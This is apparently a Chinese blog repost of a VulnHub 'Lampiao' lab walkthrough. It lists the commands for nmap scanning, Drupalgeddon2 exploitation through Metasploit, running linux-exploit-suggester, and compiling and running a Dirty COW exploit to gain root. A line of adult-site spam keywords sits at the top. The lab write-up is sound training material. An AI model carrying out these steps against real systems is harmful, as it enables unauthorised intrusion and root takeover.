日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

Linux脏牛漏洞提权

發布時間:2023/12/20 linux 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Linux脏牛漏洞提权 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

通過vulnhub平臺搭建靶場

靶機地址:Vulnerable By Design - Search: lampiao ~ VulnHub

靶機下載地址:https://download.vulnhub.com/lampiao/Lampiao.zip

下載完成后,雙擊Lampiao.ovf運行

啟動靶機后,默認是不給用戶名、密碼和IP地址的

通過查看kali自身的IP地址,如下圖,確定當前靶機也在192.168.200下,使用nmap進行C段掃描

nmap掃描192.168.200.0/24

首先我們使用nmap的sP參數通過ping探測已存活的主機

nmap -sP 192.168.200.0/24

掃描192.168.200.152的端口

nmap -p1-65535 192.168.200.152

訪問192.168.200.152:1898

啟動msf,通過msf搜索所有關于Drupal的漏洞

使用exploit/unix/webapp/drupal_drupalgeddon2

show options查看所需參數

設置目標地址和目標端口

set rhost 192.168.200.152

set rport 1898

exploit進行攻擊,并返回meterpreter會話

查看當前用戶為www-data

上傳漏洞收集腳本到目標主機賦予執行權限并執行

下載地址:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

upload /home/kali/桌面/linux-exploit-suggester.sh /tmp/1.sh

進入目標主機的/tmp目錄,查看上傳的1.sh是否存在

賦予1.sh執行權限

chmod +x 1.sh

運行1.sh,發現該靶機存在臟牛漏洞?

上傳漏洞收集腳本到目標主機賦予執行權限并執行

exp下載地址:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master

退出shell交互模式,返回meterpreter會話,將腳本上傳至目標地址

upload /home/kali/桌面/dcow.cpp /tmp/dcow.cpp

進入shell交互,編譯exp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

開啟py終端,運行./dcow,獲取密碼

python -c 'import pty; pty.spawn("/bin/bash")'

登錄root用戶,查看當前權限

用戶名:root

密碼:dirtyCowFun

總結

以上是生活随笔為你收集整理的Linux脏牛漏洞提权的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。